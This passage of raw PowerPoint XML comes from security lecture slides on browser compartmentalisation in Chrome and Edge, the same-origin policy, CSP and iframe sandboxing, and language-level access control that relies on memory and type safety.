                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="369230" indent="-369230" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="410155" indent="-369230" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0"/>
              <a:t>(Complex!) rendering engine is black box for browser kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="410155" indent="-369230" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0"/>
              <a:t>Running a new process per domain can enforce the restrictions of the SOP (Same Origin Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="410155" indent="-369230" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Advantage: TCB for certain operations drastically reduced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="410155" indent="-369230" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/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B112C4AE-571A-1E7E-981C-4C3FCEB77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GB" altLang="nl-NL" sz="2400"/>
              <a:t>Example: compartmentalisation in Chrome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DBC6F5AA-BDDF-CA1D-0F0E-0C22976A0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525" y="1558925"/>
            <a:ext cx="2913063" cy="1284288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9933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99208" tIns="51588" rIns="99208" bIns="51588" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="15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15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15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155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155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92125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="15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92125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="15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92125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="15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92125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="15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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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rendering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1984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 engine: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1984" b="1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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="18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handling HTML, CSS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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="18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, XML, DOM,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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="18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rendering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53257" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C9EE952-D630-41D3-1DD9-FF078F6BA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775" y="1689100"/>
            <a:ext cx="2913063" cy="1298575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9933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99208" tIns="51588" rIns="99208" bIns="51588" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="15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15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15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155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155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92125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="15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92125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="15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92125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="15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92125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="15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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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rendering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1984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 engine: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1984" b="1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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="18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handling HTML, CSS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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="18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, XML, DOM,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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="18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rendering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29702" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FFCD83F-A106-7F71-C8DD-31CB480A4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238" y="3416300"/>
            <a:ext cx="4725987" cy="99695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9208" tIns="51588" rIns="99208" bIns="51588" anchor="ctr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b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>browser kernel: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800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie &amp; passwd database, network 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800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stack, TLS, window management</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53261" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2939FFEE-870E-E320-3273-1975DDF40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1763713"/>
            <a:ext cx="2913063" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9933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99208" tIns="51588" rIns="99208" bIns="51588" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="15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15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15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155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155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92125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="15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92125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="15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92125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="15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92125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="155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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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rendering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1984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 engine: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1984" b="1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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="18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handling HTML, CSS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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="18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, XML, DOM,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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="18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rendering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29704" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFF0C697-E2BC-7305-677B-1380590774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6E3C4B61-8347-45B3-BA29-D2084E8E2537}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1500" smtClean="0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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29705" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2D80FE2-420C-D986-D4EB-BA5CA4ACB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438150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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AD2D2F4-9E3B-229B-8209-75B20BE6D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1820863"/>
            <a:ext cx="41560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chemeClr val="accent2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One rendering engine per tab, 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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>plus one for trusted content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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(eg HTTPS certificate warnings)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00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 i="1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No access to local file system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 i="1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and to each other</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2000" i="1">
              <a:solidFill>
                <a:srgbClr val="C0000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7" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BEB2F5D-3463-197A-DEC7-A1F8E6425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3697288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chemeClr val="accent2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One browser kernel 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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" i="1">
                <a:solidFill>
                  <a:srgbClr val="0099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full user privileges</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29708" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC664526-3D71-4EB2-C84A-B967A7132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5" y="1851025"/>
            <a:ext cx="2914650" cy="1433513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9933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99208" tIns="51588" rIns="99208" bIns="51588" anchor="ctr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b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rendering engine: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" b="1">
              <a:solidFill>
                <a:schemeClr val="tx2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800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>handling HTML, CSS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800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript, DOM,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800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rendering images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5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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F0F1E6-8A65-FAB8-B907-994DF7467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More compartmentalisation in browsers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2327CB-5FA6-9B31-31DA-6D416B62C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dirty="0"/>
              <a:t>There are more forms of compartmentalisation and sandboxing inside browsers, namely in the HTML content do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOP (Same Origin Policy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and optionally even inside the HTML content displayed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSP (Content Security Policy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sandboxing for iframes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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</a:rPr>
              <a:t>Microsoft Edge introduced Super Duper Secure Mode (SDSM) in 2021 to remove some complexity, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> disabling JIT, and to enable some additional memory protection mechanisms, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> CET (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Control flow Enforcement Technology)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1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://microsoftedge.github.io/edgevr/posts/Super-Duper-Secure-Mode/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31748" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFFD015C-432D-0C58-1DAA-2AC5B66905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446A5185-ACBD-4A8D-96F3-67C758DE8A43}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{746AB1BF-549B-BB58-4531-D0F56675AE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en-US"/>
              <a:t>Language-level access control</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Subtitle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB76C39C-CDEB-3A9D-01C8-E791D13FEF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400"/>
              <a:t>Chapter 4 of the lecture notes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4A783453-9024-CBF8-6E34-C9F8024D32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E51B898B-D463-4CAE-B755-7F3E9CFAC354}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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CD56B5CE-EB4D-6987-E2DB-3867A54F1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nl-NL"/>
              <a:t>Access control at the language level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446FF70-62A4-49BE-D5C0-A59BE73553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pPr marL="107950" indent="0" eaLnBrk="1"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nl-NL" dirty="0"/>
              <a:t>In a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0"/>
              <a:t> programming language, access control can be provided </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" i="1" dirty="0"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0"/>
              <a:t> a process, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>at language-level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0"/>
              <a:t>,  because interactions between components can be restricted &amp; controlled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nl-NL" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" eaLnBrk="1"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nl-NL" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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nl-NL" dirty="0"/>
              <a:t>This makes it possible to have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security guarantees in the presence of untrusted code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(which could be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buggy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="393700" indent="-285750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nl-NL" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Without memory-safety, this is impossible. Why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="565150" lvl="1" indent="0" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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nl-NL" dirty="0"/>
              <a:t>Because B can access any memory used by A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="450850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nl-NL" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Without type-safety, it is hard. Why? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="565150" lvl="1" indent="0" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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nl-NL" dirty="0"/>
              <a:t>Because B can pass ill-typed arguments to A's interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" eaLnBrk="1"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nl-NL" dirty="0"/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nl-NL" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33796" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AAEC42D-7C42-151A-DA76-63185B35B2E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2511425" y="2254250"/>
            <a:ext cx="5143500" cy="1500188"/>
            <a:chOff x="2520555" y="1838325"/>
            <a:chExt cx="5143500" cy="1500188"/>
          </a:xfrm>
